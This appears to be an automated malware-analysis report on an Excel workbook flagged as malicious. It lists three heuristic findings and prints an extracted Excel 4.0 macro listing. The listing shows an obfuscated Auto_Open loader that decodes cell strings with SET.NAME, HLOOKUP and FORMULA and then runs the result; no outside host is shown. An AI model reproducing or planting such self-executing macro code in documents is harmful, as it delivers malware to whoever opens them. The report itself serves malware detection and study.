MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6642 bytes |
SHA-256: ac2c596f849fc23a7f33dac6531b588d81af55b692b834cdf58fdb0ae09a6eb1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - eUsgjaOEu
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!B184
' 0018 26 LABEL : Cell Value, String Constant - coczBdQhUJL len=0
' 0018 27 LABEL : Cell Value, String Constant - DPwThitFdBtj len=0
' 0018 27 LABEL : Cell Value, String Constant - EalXFQbDOJQu len=0
' 0018 20 LABEL : Cell Value, String Constant - fEnfD len=0
' 0018 26 LABEL : Cell Value, String Constant - FsJaepTWRyO len=0
' 0018 23 LABEL : Cell Value, String Constant - GBgYysqd len=0
' 0018 22 LABEL : Cell Value, String Constant - gKHEPNy len=0
' 0018 24 LABEL : Cell Value, String Constant - gNJvWVfsE len=0
' 0018 23 LABEL : Cell Value, String Constant - hYFACSQR len=0
' 0018 25 LABEL : Cell Value, String Constant - IveyTdMCUG len=0
' 0018 23 LABEL : Cell Value, String Constant - Knarindu len=0
' 0018 21 LABEL : Cell Value, String Constant - NZWTQe len=0
' 0018 21 LABEL : Cell Value, String Constant - OCerCD len=0
' 0018 22 LABEL : Cell Value, String Constant - PvlqjOj len=0
' 0018 20 LABEL : Cell Value, String Constant - rJURm len=0
' 0018 23 LABEL : Cell Value, String Constant - SHoVGltv len=0
' 0018 27 LABEL : Cell Value, String Constant - TwPIJPMiBiCP len=0
' 0018 23 LABEL : Cell Value, String Constant - UhdFSEFo len=0
' 0018 27 LABEL : Cell Value, String Constant - USUOFgCJutQY len=0
' 0018 21 LABEL : Cell Value, String Constant - XfYeot len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' eUsgjaOEu,B88,"SET.NAME("XfYeot",VALUE("0"))",""
' eUsgjaOEu,B91,"SET.NAME("OCerCD",XfYeot)",""
' eUsgjaOEu,B96,"SET.NAME("EalXFQbDOJQu",XfYeot)",""
' eUsgjaOEu,B101,"SET.NAME("TwPIJPMiBiCP",COUNTA(gNJvWVfsE))",""
' eUsgjaOEu,B103,"SET.NAME("Knarindu",COUNTA(USUOFgCJutQY))",""
' eUsgjaOEu,B106,[],""
' eUsgjaOEu,B111,"SET.NAME("SHoVGltv","")",""
' eUsgjaOEu,B113,"OCerCD",""
' eUsgjaOEu,B115,"SET.NAME("DPwThitFdBtj",HLOOKUP("*",gNJvWVfsE,OCerCD,FALSE))",""
' eUsgjaOEu,B118,"NZWTQe",""
' eUsgjaOEu,B121,"SET.NAME("hYFACSQR",XfYeot)",""
' eUsgjaOEu,B125,[],""
' eUsgjaOEu,B130,"hYFACSQR",""
' eUsgjaOEu,B135,"rJURm",""
' eUsgjaOEu,B138,"GBgYysqd",""
' eUsgjaOEu,B142,"gKHEPNy",""
' eUsgjaOEu,B145,"SET.NAME("fEnfD",VALUE(HLOOKUP("*",USUOFgCJutQY,gKHEPNy,FALSE)))",""
' eUsgjaOEu,B150,"UhdFSEFo",""
' eUsgjaOEu,B154,"SHoVGltv",""
' eUsgjaOEu,B157,"EalXFQbDOJQu",""
' eUsgjaOEu,B159,NEXT(),""
' eUsgjaOEu,B164,"coczBdQhUJL",""
' eUsgjaOEu,B169,"SET.NAME("f",INT(T(FORMULA(T(SHoVGltv)&"",""&T(coczBdQhUJL)))))",""
' eUsgjaOEu,B172,"FsJaepTWRyO",""
' eUsgjaOEu,B177,NEXT(),""
' eUsgjaOEu,B180,RETURN(),""
' eUsgjaOEu,B212,"SET.NAME("PvlqjOj",B88)",""
' eUsgjaOEu,B214,"gNJvWVfsE",""
' eUsgjaOEu,B217,"SET.NAME("USUOFgCJutQY",R66C15)",""
' eUsgjaOEu,B220,"SET.NAME("FsJaepTWRyO",229)",""
' eUsgjaOEu,B224,"SET.NAME("IveyTdMCUG",2)",""
' eUsgjaOEu,B228,PvlqjOj(),""
' eUsgjaOEu,B229,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.